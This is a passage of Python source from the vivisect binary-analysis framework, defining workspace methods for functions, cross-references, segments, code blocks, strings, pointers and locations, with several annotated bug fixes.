    # BUGFIX: 'CallsFrom' may be unset (None); set(None) raised TypeError.
    prev_call = self.getFunctionMeta(function, 'CallsFrom') or ()
    newcall = set(prev_call).union(ncalls or ())
    self.setFunctionMeta(function, 'CallsFrom', list(newcall))
def makeCode(self, va, arch=envi.ARCH_DEFAULT, fva=None):
    """
    Attempt to begin code-flow based disassembly by
    starting at the given va. The va will be made into
    an OpcodeLoc and refs will be walked continuing to
    make code where possible.
    """
    # Already defined as some location? Nothing to do.
    if self.isLocation(va):
        return

    calls_from = self.cfctx.addCodeFlow(va, arch=arch)
    if fva is not None:
        # Fold the discovered call targets into the owning function.
        self.updateCallsFrom(fva, calls_from)
    else:
        # Orphan flow: track it in the CodeFragments VA set instead.
        self.setVaSetRow('CodeFragments', (va, calls_from))
    return calls_from
def previewCode(self, va, arch=envi.ARCH_DEFAULT):
    '''
    Show the repr of an instruction in the current canvas *before* making it that
    '''
    try:
        op = self.parseOpcode(va, arch)
        if op is None:
            # BUGFIX: the format string was never given its argument
            # (self.vprint("0x%x - None") printed the literal "%x").
            self.vprint("0x%x - None" % va)
        else:
            self.vprint("0x%x (%d bytes) %s" % (va, len(op), repr(op)))
    except Exception:
        self.vprint("0x%x - decode exception" % va)
        logger.exception("preview opcode exception:")
#################################################################
#
# Function API
#
def isFunction(self, funcva):
    """
    Check whether funcva is a known function entry point.
    """
    meta = self.funcmeta.get(funcva)
    return meta is not None
def isFunctionThunk(self, funcva):
    """
    Check whether funcva is a function with 'Thunk' metadata set.
    Non-functions simply answer False.
    """
    # TODO: could we do more here?
    try:
        thunk = self.getFunctionMeta(funcva, 'Thunk')
    except InvalidFunction:
        return False
    return thunk is not None
def getFunctions(self):
    """
    Return the virtual addresses of every function defined in the
    workspace as a list.
    """
    return [fva for fva in self.funcmeta]
def getFunction(self, va):
    """
    Return the entry VA of the function containing va (va itself when it
    is an entry point, otherwise via its code block), or None.
    """
    if self.funcmeta.get(va) is not None:
        return va
    cbtup = self.getCodeBlock(va)
    if cbtup is None:
        return None
    return cbtup[CB_FUNCVA]
def makeFunction(self, va, meta=None, arch=envi.ARCH_DEFAULT):
    """
    Do parsing for function information and add a new function doodad.

    This function should probably only be called once code-flow for the
    area is complete.

    meta - optional dict of function metadata key/value pairs to set
    Returns the real entry VA chosen by the codeflow context (or None
    when va is already a function). Raises InvalidLocation for an
    invalid pointer.
    """
    logger.debug('makeFunction(0x%x, %r, 0x%x)', va, meta, arch)
    if self.isFunction(va):
        logger.debug('0x%x is already a function, skipping', va)
        return

    if not self.isValidPointer(va):
        raise InvalidLocation(va)

    # Prefer an architecture already recorded on an opcode location at va.
    loc = self.getLocation(va)
    if loc is not None and loc[L_TINFO] is not None and loc[L_LTYPE] == LOC_OP:
        arch = loc[L_TINFO]

    realfva = self.cfctx.addEntryPoint(va, arch=arch)
    if meta is not None:
        for key, val in meta.items():
            self.setFunctionMeta(realfva, key, val)
    return realfva
def delFunction(self, funcva):
    """
    Remove a function, its code blocks and all associated metadata.
    Raises InvalidLocation when funcva is not a known function.
    """
    if self.funcmeta.get(funcva) is None:
        raise InvalidLocation(funcva)
    self._fireEvent(VWE_DELFUNCTION, funcva)
def setFunctionArg(self, fva, idx, atype, aname):
    '''
    Set the name and type information for a single function arguemnt by index.

    Example:
        # If we were setting up main...
        vw.setFunctionArg(fva, 0, 'int','argc')
        vw.setFunctionArg(fva, 1, 'char **','argv')
    '''
    rettype, retname, callconv, callname, callargs = self.getFunctionApi(fva)
    # Pad missing slots with generic int args up to the requested index.
    while len(callargs) <= idx:
        callargs.append(('int', 'arg%d' % len(callargs)))
    callargs[idx] = (atype, aname)
    self.setFunctionApi(fva, (rettype, retname, callconv, callname, callargs))
def getFunctionArgs(self, fva):
    '''
    Returns the list of (typename,argname) tuples which define the
    arguments for the specified function.

    Example:
        for typename,argname in vw.getFunctionArgs(fva):
            print('Takes: %s %s' % (typename,argname))
    '''
    api = self.getFunctionApi(fva)
    return list(api[-1])
def getFunctionApi(self, fva):
    '''
    Retrieve the API definition for the given function address.

    Returns: an API tuple (similar to impapi subsystem)
        ( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
    falling back to a void/no-arg default using the workspace's
    'DefaultCall' convention when no 'api' metadata is set.
    '''
    api = self.getFunctionMeta(fva, 'api')
    if api is not None:
        return api
    defcall = self.getMeta('DefaultCall', 'unkcall')
    return ('void', None, defcall, None, ())
def setFunctionApi(self, fva, apidef):
    '''
    Set a function's API definition.
    NOTE: apidef is a tuple similar to the impapi subsystem
        ( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )

    Example:
        apidef = ('int','size','stdcall','getThingSize', ( ('void *','thing'), ))
        vw.setFunctionApi(fva, apidef)
    '''
    self.setFunctionMeta(fva, 'api', apidef)
def getFunctionLocals(self, fva):
    '''
    Retrieve the list of (fva,spdelta,symtype,syminfo) tuples which
    represent the given function's local memory offsets.
    Raises InvalidFunction when fva is not a function.
    '''
    if not self.isFunction(fva):
        raise InvalidFunction(fva)
    return [locsym for locsym in self.localsyms[fva].values()]
def getFunctionLocal(self, fva, spdelta):
    '''
    Retrieve a function local symbol definition as a
    (typename,symname) tuple or None if not found.

    NOTE: If the local symbol references a LSYM_FARG, this API
          will resolve the argument name/type from the function API
          definition.

    Example:
        locsym = vw.getFunctionLocal(fva, 8)
        if locsym:
            symtype,symname = locsym
            print('%s %s;' % (symtype,symname))
    '''
    locsym = self.localsyms[fva].get(spdelta)
    if locsym is None:
        return None

    fva, spdelta, symtype, syminfo = locsym
    # Direct name symbols carry their (typename, symname) tuple inline.
    if symtype == LSYM_NAME:
        return syminfo

    # Function-argument symbols: syminfo is an index into the API's args.
    if symtype == LSYM_FARG:
        apidef = self.getFunctionApi(fva)
        if apidef is None:
            return None

        funcargs = apidef[-1]
        if syminfo >= len(funcargs):
            return None

        return funcargs[syminfo]

    raise Exception('Unknown Local Symbol Type: %d' % symtype)
def setFunctionLocal(self, fva, spdelta, symtype, syminfo):
    '''
    Assign a local symbol within a function (addressed
    by delta from initial sp).  For each symbol, a "symtype"
    and "syminfo" field are used to specify the details.

    Example:
        # Setup a regular local integer
        vw.setFunctionLocal(fva, -4, LSYM_NAME, ('int','x'))

        # Setup a link to a stack argument... (ie. i386 cdecl)
        vw.setFunctionLocal(fva, 4, LSYM_FARG, 0)

        # Setup amd64 style shadow space
        vw.setFunctionLocal(fva, 8, LSYM_NAME, ('void *','shadow0'))
    '''
    # Locals are stored as per-spdelta function metadata entries.
    self.setFunctionMeta(fva, 'LocalSymbol:%d' % spdelta, (fva, spdelta, symtype, syminfo))
def setFunctionMeta(self, funcva, key, value):
    """
    Set meta key,value pairs that describe a particular
    function (by funcva).

    Example: vw.setFunctionMeta(fva, "WootKey", 10)

    Raises InvalidFunction when funcva is not a known function.
    """
    if not self.isFunction(funcva):
        raise InvalidFunction(funcva)
    self._fireEvent(VWE_SETFUNCMETA, (funcva, key, value))
def getFunctionMeta(self, funcva, key, default=None):
    """
    Return the named metadata value for the function at funcva, or
    default when the key is unset. Raises InvalidFunction when funcva
    is not a known function.
    """
    metadict = self.funcmeta.get(funcva)
    if metadict is None:
        raise InvalidFunction(funcva)
    return metadict.get(key, default)
def getFunctionMetaDict(self, funcva):
    """
    Return the entire metadata dictionary for the function at funcva
    (None when funcva is not a function).
    """
    return self.funcmeta.get(funcva)
def getFunctionBlocks(self, funcva):
    """
    Return the code-block objects for the given function va
    (an empty list when none are known).
    """
    blocks = self.codeblocks_by_funcva.get(funcva)
    if blocks is None:
        blocks = []
    return blocks
def makeFunctionThunk(self, fva, thname, addVa=True, filelocal=False):
    """
    Inform the workspace that a given function is considered a "thunk" to another.
    This allows the workspace to process argument inheritance and several other things.

    addVa     - append the thunk's VA to the generated name
    filelocal - make the name file-local

    Usage: vw.makeFunctionThunk(0xvavavava, "kernel32.CreateProcessA")
    """
    self.checkNoRetApi(thname, fva)
    self.setFunctionMeta(fva, "Thunk", thname)

    # Name the thunk after the target's base name (last dotted component).
    # (dropped the unused getName()/makeName() result bindings)
    base = thname.split(".")[-1]
    if addVa:
        name = "%s_%.8x" % (base, fva)
    else:
        name = base
    self.makeName(fva, name, filelocal=filelocal, makeuniq=True)

    # Inherit the import API, filling in any missing argument names.
    api = self.getImpApi(thname)
    if api:
        rettype, retname, callconv, callname, callargs = api
        callargs = [arg if arg[1] else (arg[0], 'arg%d' % i) for i, arg in enumerate(callargs)]
        self.setFunctionApi(fva, (rettype, retname, callconv, callname, callargs))
def getCallers(self, va):
    '''
    Get the va for all the callers of the given function/import.

    Example:
        for va in vw.getCallers( importva ):
            dostuff(va)
    '''
    # Procedural (call) code xrefs only.
    return [fromva for fromva, tova, rtype, rflags in self.getXrefsTo(va, rtype=REF_CODE)
            if rflags & envi.BR_PROC]
def getCallGraph(self):
    '''
    Retrieve a visgraph Graph object representing all known inter procedural
    branches in the workspace.  Each node has an ID that is the same as the
    function va.

    Example:
        graph = vw.getCallGraph()
    '''
    return self._call_graph
def getFunctionGraph(self, fva):
    '''
    Retrieve a code-block graph for the specified virtual address.
    Procedural branches (ie, calls) will not be followed during graph
    construction.
    '''
    return viv_codegraph.FuncBlockGraph(self, fva)
def getImportCallers(self, name):
    """
    Get a list of all the callers who reference the specified import
    by name. (If we detect that the name is actually *in* our workspace,
    return those callers too...
    """
    ret = []

    # If it's a local function, do that too..
    localfva = self.vaByName(name)
    if localfva is not None and self.isFunction(localfva):
        ret = self.getCallers(localfva)

    # Thunks to the named import count as the import itself.
    for thunkfva in self.getFunctions():
        if self.getFunctionMeta(thunkfva, 'Thunk') == name:
            ret.extend(self.getCallers(thunkfva))

    # Finally, callers of matching import locations.
    for lva, lsize, ltype, tinfo in self.getLocations(LOC_IMPORT):
        if tinfo == name:
            ret.extend(self.getCallers(lva))

    return ret
#################################################################
#
# Xref API
#
def getXrefs(self, rtype=None):
    """
    Return the entire list of XREF tuples for this workspace,
    optionally filtered to a single reference type.
    """
    if not rtype:
        return self.xrefs
    return [xtup for xtup in self.xrefs if xtup[XR_RTYPE] == rtype]
def getXrefsFrom(self, va, rtype=None):
    """
    Return a list of tuples for the xrefs whose origin is the
    specified va.  Optionally, only return xrefs whose type
    field is rtype if specified.

    example:
        for fromva, tova, rtype, rflags in vw.getXrefsFrom(0x41414141):
            dostuff(tova)
    """
    refs = self.xrefs_by_from.get(va)
    if refs is None:
        return []
    if rtype is None:
        return refs
    return [xtup for xtup in refs if xtup[XR_RTYPE] == rtype]
def getXrefsTo(self, va, rtype=None):
    """
    Get a list of xrefs which point to the given va. Optionally,
    specify an rtype to get only xrefs of that type.
    """
    # FIXME make xrefs use MapLookup!
    refs = self.xrefs_by_to.get(va)
    if refs is None:
        return []
    if rtype is None:
        return refs
    return [xtup for xtup in refs if xtup[XR_RTYPE] == rtype]
def addMemoryMap(self, va, perms, fname, bytes):
    """
    Add a memory map to the workspace.  This is the *only* way to
    get memory backings into the workspace.
    """
    # All state changes flow through the event subsystem.
    self._fireEvent(VWE_ADDMMAP, (va, perms, fname, bytes))
def delMemoryMap(self, va):
    """
    Removing a memory map is not supported by the workspace.

    BUGFIX: the old body was `raise "OMG"`, which in Python 3 is itself a
    TypeError (exceptions must derive from BaseException) and hid the
    intent. Raise NotImplementedError explicitly instead.
    """
    raise NotImplementedError('delMemoryMap is not supported')
def addSegment(self, va, size, name, filename):
    """
    Add a "segment" to the workspace.  A segment is generally some meaningful
    area inside of a memory map.  For PE binaries, a segment and a memory map
    are synonymous.  However, some platforms (Elf) specify their memory maps
    (program headers) and segments (sectons) seperately.
    """
    # All state changes flow through the event subsystem.
    self._fireEvent(VWE_ADDSEGMENT, (va, size, name, filename))
def getSegment(self, va):
    """
    Return the tuple representation of the segment containing va, with
    the following format:

    (va, size, name, filename)

    Returns None when va falls in no segment.
    """
    for seg in self.segments:
        segva, segsize = seg[0], seg[1]
        if segva <= va < segva + segsize:
            return seg
    return None
def getSegments(self):
    """
    Return a (copied) list of segment tuples (see getSegment) for all
    the segments defined in the current workspace.
    """
    return list(self.segments)
def addCodeBlock(self, va, size, funcva):
    """
    Add a region of code which belongs to a function. Code-block boundaries
    are at all logical branches and have more in common with a logical
    graph view than function chunks.

    Raises when va has no defined location (blocks must sit on locations).
    """
    if self.getLocation(va) is None:
        raise Exception('Adding Codeblock on *non* location?!?: 0x%.8x' % va)
    self._fireEvent(VWE_ADDCODEBLOCK, (va, size, funcva))
def getCodeBlock(self, va):
    """
    Return the codeblock which contains the given va.  A "codeblock"
    is a location compatable tuple: (va, size, funcva)
    """
    return self.blockmap.getMapLookup(va)
def delCodeBlock(self, va):
    """
    Remove a code-block definition from the codeblock namespace.
    Raises when va is not inside any known code block.
    """
    cb = self.getCodeBlock(va)
    if cb is None:
        raise Exception("Unknown Code Block: 0x%x" % va)
    self._fireEvent(VWE_DELCODEBLOCK, cb)
def getCodeBlocks(self):
    """
    Return a (copied) list of all the codeblock tuples.
    """
    return list(self.codeblocks)
def addXref(self, fromva, tova, reftype, rflags=0):
    """
    Add an xref with the specified fromva, tova, and reftype
    (see REF_ macros).  This will *not* trigger any analysis.
    Callers are expected to do their own xref analysis (ie, makeCode() etc)

    Duplicate xrefs are silently ignored.
    """
    # Architecture gets to decide on actual final VA (ARM/THUMB/etc...)
    tova, reftype, rflags = self.arch.archModifyXrefAddr(tova, reftype, rflags)
    xref = (fromva, tova, reftype, rflags)
    if xref in self.getXrefsFrom(fromva):
        return
    self._fireEvent(VWE_ADDXREF, xref)
def delXref(self, ref):
    """
    Remove the given xref tuple (fromva, tova, rtype, rflags).
    This *will* exception if the xref doesn't already exist...
    """
    if ref not in self.getXrefsFrom(ref[XR_FROM]):
        # BUGFIX: the old format string had three placeholders for a
        # four-tuple, so the raise itself died with a TypeError.
        raise Exception("Unknown Xref: 0x%x -> 0x%x (rtype: %d, rflags: 0x%x)" % ref)
    self._fireEvent(VWE_DELXREF, ref)
def analyzePointer(self, va):
    """
    Assume that a new pointer has been created.  Check if it's
    target has a defined location and if not, try to figure out
    what's there.  Will return the location type of the location
    it recommends or None if a location is already there or it has
    no idea.
    """
    # Something is already defined there; nothing to recommend.
    if self.getLocation(va) is not None:
        return None
    # Probe in order of decreasing specificity.
    if self.isProbablyUnicode(va):
        return LOC_UNI
    if self.isProbablyString(va):
        return LOC_STRING
    if self.isProbablyCode(va):
        return LOC_OP
    return None
def getMeta(self, name, default=None):
    """
    Return the named workspace meta value (default when unset).
    """
    return self.metadata.get(name, default)
def setMeta(self, name, value):
    """
    Set a meta key,value pair for this workspace.
    """
    # All state changes flow through the event subsystem.
    self._fireEvent(VWE_SETMETA, (name, value))
def markDeadData(self, start, end):
    """
    Mark the virtual range [start, end] as dead data (persisted via a
    'deaddata:' meta key keyed on the start address).
    """
    self.setMeta("deaddata:0x%08x" % start, (start, end))
def unmarkDeadData(self, start, end):
    """
    Remove the (start, end) range from the dead-data list.
    Raises ValueError when the range was never marked.
    """
    self._dead_data.remove((start, end))
def _mcb_deaddata(self, name, value):
"""
callback from setMeta with namespace
deaddata:
that indicates a range has been added
as dead data.
"""
if value not in self._dead_data:
self._dead_data.append( value )
def isDeadData(self, va):
    """
    Return boolean indicating va is in
    a dead data range (both ends inclusive).
    """
    return any(start <= va <= end for start, end in self._dead_data)
def initMeta(self, name, value):
    """
    Set a metakey ONLY if it is not already set.  Either
    way return the value of the meta key.
    """
    current = self.getMeta(name)
    if current is not None:
        return current
    self.setMeta(name, value)
    return value
def getTransMeta(self, mname, default=None):
    '''
    Retrieve a piece of "transient" metadata which is *not*
    stored across runs or pushed through the event subsystem.
    '''
    return self.transmeta.get(mname, default)
def setTransMeta(self, mname, value):
    '''
    Store a piece of "transient" metadata which is *not*
    stored across runs or pushed through the event subsystem.
    '''
    self.transmeta[mname] = value
def castPointer(self, va):
    """
    Return the value for a pointer in memory at
    the given location.  This method does NOT
    create a location object or do anything other
    than parse memory.
    """
    off, bytez = self.getByteDef(va)
    return e_bits.parsebytes(bytez, off, self.psize, bigend=self.bigend)
def guessDataPointer(self, ref, tsize):
    '''
    Trust vivisect to do the right thing and make a value and a
    pointer to that value

    ref   - VA of the referenced data
    tsize - operand size in bytes of the referencing instruction
    Returns the new location tuple (string/unicode/pointer/number).
    '''
    # So we need the size check to avoid things like "aaaaa", maybe
    # but maybe if we do something like the tsize must be either the
    # target pointer size or in a set of them that the arch defines?
    nloc = None
    # First preference: string-ish data at the target.
    try:
        if self.isProbablyUnicode(ref):
            nloc = self.makeUnicode(ref)
        elif self.isProbablyString(ref):
            nloc = self.makeString(ref)
    except e_exc.SegmentationViolation:
        # Usually means val is 0 and we can just ignore this error
        nloc = None
    except Exception as e:
        logger.warning('makeOpcode string making hit error %s', str(e))
        nloc = None

    # Not a string: make either a pointer (when the parsed value is a
    # valid pointer-sized pointer) or a plain number.
    if not nloc:
        val = self.parseNumber(ref, tsize)
        if (self.psize == tsize and self.isValidPointer(val)):
            nloc = self.makePointer(ref, tova=val)
        else:
            nloc = self.makeNumber(ref, tsize)
    return nloc
def makePointer(self, va, tova=None, follow=True):
    """
    Create a new pointer location in the workspace.  If you have already
    parsed out the pointers value, you may specify tova to speed things
    up.

    Returns the new location tuple, or None when a location already
    exists at va.
    """
    existing = self.getLocation(va)
    if existing is not None:
        # Only warn when the existing location is something other than a
        # pointer rooted exactly at va.
        if existing[L_LTYPE] != LOC_POINTER or existing[L_VA] != va:
            logger.warning("0x%x: Attempting to make a Pointer where another location object exists (of type %r)", va, self.reprLocation(existing))
        return None

    # Get and document the xrefs created for the new location
    if tova is None:
        tova = self.castPointer(va)
    self.addXref(va, tova, REF_PTR)

    ploc = self.addLocation(va, self.psize, LOC_POINTER)

    if follow and self.isValidPointer(tova):
        self.followPointer(tova)

    return ploc
def makePad(self, va, size):
    """
    A special utility for making a pad of a particular size.
    Returns the new LOC_PAD location tuple.
    """
    return self.addLocation(va, size, LOC_PAD, None)
def makeNumber(self, va, size, val=None):
    """
    Create a number location in memory of the given size.

    NOTE: the optional val argument is accepted for API compatibility
    but is currently unused — the location stores no parsed value.
    """
    return self.addLocation(va, size, LOC_NUMBER, None)
def parseNumber(self, va, size):
    '''
    Parse a <size> width numeric value from memory at <va>.

    Example:
        val = vw.parseNumber(0x41414140, 4)
    '''
    off, bytez = self.getByteDef(va)
    return e_bits.parsebytes(bytez, off, size, bigend=self.bigend)
def _getSubstrings(self, va, size, ltyp):
    '''
    Collect (va, size) pairs for already-defined substring locations of
    type ltyp that begin inside the range [va, va+size), including any
    substrings those locations already track in their tinfo.
    '''
    subs = set()
    for offs in range(va, va + size):
        loc = self.getLocation(offs, range=True)
        # BUGFIX: honor the ltyp parameter (it was ignored and LOC_STRING
        # hardcoded, so makeUnicode's LOC_UNI substring scan never matched).
        if loc and loc[L_LTYPE] == ltyp and loc[L_VA] > va:
            subs.add((loc[L_VA], loc[L_SIZE]))
            if loc[L_TINFO]:
                subs = subs.union(set(loc[L_TINFO]))
    return list(subs)
def _getStrTinfo(self, va, size, subs):
    '''
    Fold the would-be string (va, size) and its substring list subs into
    any enclosing string/unicode parent location, returning the
    (va, size, tinfo) triple that the caller should actually store.
    '''
    ploc = self.getLocation(va, range=False)
    if ploc:
        # the string we're making is a substring of some outer one
        # still make this string location, but let the parent know about us too and our
        # children as well. Ultimately, the outermost parent should be responsible for
        # knowing about all it's substrings
        modified = False
        pva, psize, ptype, pinfo = ploc
        # Only string-ish parents participate in substring tracking.
        if ptype not in (LOC_STRING, LOC_UNI):
            return va, size, subs

        # Register ourselves with the parent if not already known.
        if (va, size) not in pinfo:
            modified = True
            pinfo.append((va, size))

        # And register our own substrings with the parent as well.
        for sva, ssize in subs:
            if (sva, ssize) not in pinfo:
                modified = True
                pinfo.append((sva, ssize))

        tinfo = pinfo
        # When the parent absorbed anything new, the caller should store
        # the (possibly larger) parent location instead of ours.
        if modified:
            va = pva
            size = psize
    else:
        tinfo = subs

    return va, size, tinfo
def makeString(self, va, size=None):
    """
    Create a new string location at the given VA.  You may optionally
    specify size.  If size==None, the string will be parsed as a NULL
    terminated ASCII string.

    Substrings are also handled here. Generally, the idea is:
    * if the memory range is completey undefined, we just create a new string at the VA specified (provided that asciiStringSize return a size greater than 0 or the parameter size is greater than 0)
    * if we create a string A at virtual address 0x40 with size 20, and then later a string B at virtual
      address 0x44, we won't actually make a new location for the string B, but rather add info to the
      tinfo portion of the location tuple for string A, and when trying to retrieve string B via getLocation,
      we'll make up a (sort of) fake location tuple for string B, provided that range=True is passed to
      getLocation
    * if we create string A at virtual address 0x40, and then later a string B at virtual 0x30
      that has a size of 16 or more, we overwrite the string A with the location information for string B,
      and demote string A to being a tuple of (VA, size) inside of string B's location information.

    This method only captures suffixes, but perhaps in the future we'll have symbolik resolution that can
    capture true substrings that aren't merely suffixes.

    This same formula is applied to unicode detection as well
    """
    if size is None:
        size = self.asciiStringSize(va)

    if size <= 0:
        raise Exception("Invalid String Size: %d" % size)

    # rip through the desired memory range to populate any substrings
    subs = self._getSubstrings(va, size, LOC_STRING)
    pva, psize, tinfo = self._getStrTinfo(va, size, subs)

    if self.getName(va) is None:
        m = self.readMemory(va, size-1).replace(b'\n', b'')
        # BUGFIX: non-UTF8 bytes used to raise out of makeString; fall back
        # to the raw bytes the same way makeUnicode does.
        try:
            self.makeName(va, "str_%s_%.8x" % (m[:16].decode('utf-8'), va))
        except UnicodeDecodeError:
            self.makeName(va, "str_%s_%.8x" % (m[:16], va))
    return self.addLocation(pva, psize, LOC_STRING, tinfo=tinfo)
def makeUnicode(self, va, size=None):
    """
    Create a new unicode (LOC_UNI) location at va.  When size is None it
    is detected via uniStringSize().  Substring folding mirrors
    makeString() — see its docstring for the full rules.
    """
    if size is None:
        size = self.uniStringSize(va)

    if size <= 0:
        raise Exception("Invalid Unicode Size: %d" % size)

    subs = self._getSubstrings(va, size, LOC_UNI)
    pva, psize, tinfo = self._getStrTinfo(va, size, subs)

    if self.getName(va) is None:
        m = self.readMemory(va, size-1).replace(b'\n', b'').replace(b'\0', b'')
        # BUGFIX: narrowed the former bare `except:` (which also swallowed
        # KeyboardInterrupt/SystemExit); fall back to a bytes-based name on
        # any ordinary failure of decode/makeName.
        try:
            self.makeName(va, "wstr_%s_%.8x" % (m[:16].decode('utf-8'), va))
        except Exception:
            self.makeName(va, "wstr_%s_%.8x" % (m[:16], va))
    return self.addLocation(pva, psize, LOC_UNI, tinfo=tinfo)
def addConstModule(self, modname):
    '''
    Add constants declared within the named module
    to the constants resolver namespace.

    Example: vw.addConstModule('vstruct.constants.ntstatus')
    '''
    self.vsconsts.addModule(self.loadModule(modname))
def addStructureModule(self, namespace, modname):
    '''
    Add a vstruct structure module to the workspace with the given
    namespace.

    Example: vw.addStructureModule('ntdll', 'vstruct.defs.windows.win_5_1_i386.ntdll')

    This allows subsequent struct lookups by names like
    '''
    self.vsbuilder.addVStructNamespace(namespace, self.loadModule(modname))
def getStructure(self, va, vstructname):
    """
    Parse and return a vstruct object for the given name.  This
    (like parseOpcode) does *not* require that the location be a struct
    and will not create one (use makeStructure).
    """
    # Try the global vstruct registry first, then user-defined ctors.
    vs = vstruct.getStructure(vstructname)
    if vs is None:
        vs = self.vsbuilder.buildVStruct(vstructname)
    if vs is not None:
        vs.vsParse(self.readMemory(va, len(vs)))
    return vs
def makeStructure(self, va, vstructname, vs=None):
    """
    Make a location which is a structure and will be parsed/accessed
    by vstruct. You must specify the vstruct name for the structure
    you wish to have at the location. Returns a vstruct from the
    location.
    """
    if vs is None:
        vs = self.getStructure(va, vstructname)

    self.addLocation(va, len(vs), LOC_STRUCT, vstructname)

    # add pointer xrefs for any valid pointer primitives in the struct
    offset = 0
    for prim in vs.vsGetPrims():
        if isinstance(prim, vs_prims.v_ptr):
            tgt = prim.vsGetValue()
            if self.isValidPointer(tgt):
                self.addXref(va + offset, tgt, REF_PTR)
        offset += len(prim)

    return vs
def getUserStructNames(self):
    '''
    Retrieve the list of the existing user-defined structure names.

    Example:
        for name in vw.getUserStructNames():
            print('Structure Name: %s' % name)
    '''
    return self.vsbuilder.getVStructCtorNames()
def getUserStructSource(self, sname):
    '''
    Get the C source code (as a string) for the given user-defined
    structure, or None if no such structure has been saved.

    Example:
        ssrc = vw.getUserStructSource('MyStructureThing')
    '''
    return self.getMeta('ustruct:%s' % sname)
def setUserStructSource(self, ssrc):
    '''
    Save the input string as a C structure definition for the
    workspace. User-defined structures may then be applied
    to locations, or further edited in the future.

    Example:
        src = "struct woot { int x; int y; };"
        vw.setUserStructSource( src )
    '''
    # Compiling the source both validates it and yields a constructor...
    ctor = vs_cparse.ctorFromCSource(ssrc)

    # ...which we instantiate once just to learn the declared type name.
    cname = ctor().vsGetTypeName()

    self.setMeta('ustruct:%s' % cname, ssrc)
    return cname
def asciiStringSize(self, va):
    """
    Return the size (in bytes) of the NUL terminated ascii string at va,
    including the terminator, or -1 if no terminator is found in the
    memory map.
    """
    offset, bytez = self.getByteDef(va)
    term = bytez.find(b'\x00', offset)
    return -1 if term == -1 else (term - offset) + 1
def uniStringSize(self, va):
    """
    Return the size (in bytes) of the unicode (UTF-16) string at va,
    including the two terminator bytes, or -1 if no b'\\x00\\x00'
    terminator is found in the memory map.
    """
    offset, bytez = self.getByteDef(va)
    term = bytez.find(b'\x00\x00', offset)
    return -1 if term == -1 else (term - offset) + 2
def addLocation(self, va, size, ltype, tinfo=None):
    """
    Add a location tuple (va, size, ltype, tinfo) to the workspace
    via the event stream, and return the tuple.
    """
    ltup = (va, size, ltype, tinfo)
    self._fireEvent(VWE_ADDLOCATION, ltup)
    return ltup
def getLocations(self, ltype=None, linfo=None):
    """
    Return a list of location tuples from the workspace, optionally
    restricted to a given location type (and, further, type info).
    """
    def wanted(loc):
        if ltype is None:
            return True
        if loc[2] != ltype:
            return False
        return linfo is None or loc[3] == linfo

    return [loc for loc in self.loclist if wanted(loc)]
def isLocation(self, va, range=False):
    """
    Return True if the va represents a location already.
    (range=True also matches a va *inside* a location.)
    """
    # idiom: return the boolean directly instead of if/return True/False
    # ('range' shadows the builtin but is kept for interface compat)
    return self.getLocation(va, range=range) is not None
def isLocType(self, va, ltype):
    """
    You may use this to test if a given VA represents
    a location of the specified type.

    example:
        if vw.isLocType(0x41414141, LOC_STRING):
            print("string at: 0x41414141")
    """
    # make it operate like py2 did: a None va is simply not a location
    if va is None:
        return False
    loctup = self.getLocation(va)
    return loctup is not None and loctup[L_LTYPE] == ltype
def getLocation(self, va, range=True):
    """
    Return the va,size,ltype,tinfo tuple for the given location.
    (specify range=True to potentially match a va that is inside
    a location rather than the beginning of one, this behavior
    only affects strings/substring retrieval currently)
    """
    loc = self.locmap.getMapLookup(va)
    if not loc:
        # nothing maps this va (None / falsy)
        return loc
    if range and loc[L_LTYPE] in (LOC_STRING, LOC_UNI):
        # dig into any sublocations that may have been created, trying to find the best match
        # possible, where "best" means the substring that both contains the va, and has no substrings
        # that contain the va.
        if not loc[L_TINFO]:
            return loc
        # tinfo holds (sub_va, sub_size) pairs; scanning in ascending va
        # order means the last hit below is the innermost/closest match
        subs = sorted(loc[L_TINFO], key=lambda k: k[0], reverse=False)
        ltup = loc
        for sva, ssize in subs:
            if sva <= va < sva + ssize:
                ltup = (sva, ssize, loc[L_LTYPE], [])
        return ltup
    else:
        return loc
def getLocationRange(self, va, size):
    """
    A "location range" is a list of location tuples where
    undefined space *will* be represented by LOC_UNDEF tuples
    to provide a complete accounting of linear workspace.
    """
    ret = []
    endva = va+size
    undefva = None
    while va < endva:
        ltup = self.getLocation(va)
        if ltup is None:
            # undefined byte: open (or extend) a pending LOC_UNDEF run
            if undefva is None:
                undefva = va
            va += 1
        else:
            # defined location: flush any pending undef run first...
            if undefva is not None:
                ret.append((undefva, va-undefva, LOC_UNDEF, None))
                undefva = None
            # ...then emit the location and skip past it
            ret.append(ltup)
            va += ltup[L_SIZE]
    # Mop up any hanging udefs
    if undefva is not None:
        ret.append((undefva, va-undefva, LOC_UNDEF, None))
    return ret
def delLocation(self, va):
    """
    Delete the given Location object from the binary
    (removes any xrefs/etc for the location as well)

    This will raise InvalidLocation if the va is not
    an exact match for the beginning of a location.
    """
    loc = self.getLocation(va)
    if loc is None:
        raise InvalidLocation(va)

    # drop every xref originating at this location before the event
    for xref in self.getXrefsFrom(va):
        self.delXref(xref)

    self._fireEvent(VWE_DELLOCATION, loc)
def getRenderInfo(self, va, size):
    """
    Get nearly everything needed to render a workspace area
    to a display. This function *greatly* speeds up interface
    code and is considered "tightly coupled" with the asmview
    code. (and is therefore subject to change).

    Returns (locs, funcs, names, comments, extras) where extras maps
    opcode/structure vas to their parsed objects.
    """
    locs = []
    funcs = {}
    names = {}
    comments = {}
    extras = {}
    for loc in self.getLocationRange(va, size):
        lva, lsize, ltype, tinfo = loc
        locs.append(loc)
        name = self.getName(lva)
        isfunc = self.isFunction(lva)
        cmnt = self.getComment(lva)
        if name is not None:
            names[lva] = name
        if isfunc == True:
            funcs[lva] = True
        if cmnt is not None:
            comments[lva] = cmnt
        if ltype == LOC_UNDEF:
            # Expand out all undefs so we can send all the info
            endva = lva + lsize
            while lva < endva:
                uname = self.getName(lva)
                ucmnt = self.getComment(lva)
                if uname is not None:
                    names[lva] = uname
                if ucmnt is not None:
                    comments[lva] = ucmnt
                #ret.append(((lva, 1, LOC_UNDEF, None), self.getName(lva), False, self.getComment(lva)))
                lva += 1
        elif ltype == LOC_OP:
            # pre-parse opcodes so the view layer doesn't have to
            extras[lva] = self.parseOpcode(lva)
        elif ltype == LOC_STRUCT:
            extras[lva] = self.getStructure(lva, tinfo)
    return locs, funcs, names, comments, extras
def getPrevLocation(self, va, adjacent=True):
    """
    Get the previous location behind this one. If adjacent
    is true, only return a location which is IMMEDIATELY behind
    the given va; otherwise scan backward until a location is
